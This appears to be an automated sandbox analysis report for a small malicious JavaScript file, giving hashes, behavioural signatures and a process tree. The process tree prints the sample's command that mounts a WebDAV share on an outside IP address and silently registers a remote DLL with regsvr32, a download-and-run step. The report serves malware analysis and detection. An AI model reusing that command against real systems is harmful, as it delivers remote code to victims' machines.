Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 02:38
Static task
static1
Behavioral task
behavioral1
Sample
111052049559873833.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
111052049559873833.js
Resource
win10v2004-20240709-en
General
-
Target
111052049559873833.js
-
Size
4KB
-
MD5
09927056de05192f2b78f151931a99d5
-
SHA1
45fbb9246249cfc2ce08a624c8b655ada6da1e4c
-
SHA256
599b194c9c1a1b726dd9fca795933462033be69fe873b9e361ab0ae94cd58f3c
-
SHA512
2ebce87e111b82240d4b2b5630bcb2cfdfd4e40811733be62adf6314d6bd4d4d0f7362f28fde5478909b5a7eeb526b888017ed9f46223e677942e1002b5029f7
-
SSDEEP
96:Vt2UpphhJzSRdQ0hbD2MjjcAkYOhbD2Mjjcd2Do:aUppVzSRhhbD2MjjcAkYOhbD2Mjjcd2E
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3660 wrote to memory of 1404 3660 wscript.exe 84 PID 3660 wrote to memory of 1404 3660 wscript.exe 84 PID 1404 wrote to memory of 1600 1404 cmd.exe 86 PID 1404 wrote to memory of 1600 1404 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\111052049559873833.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\10776496031730.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1600
-
-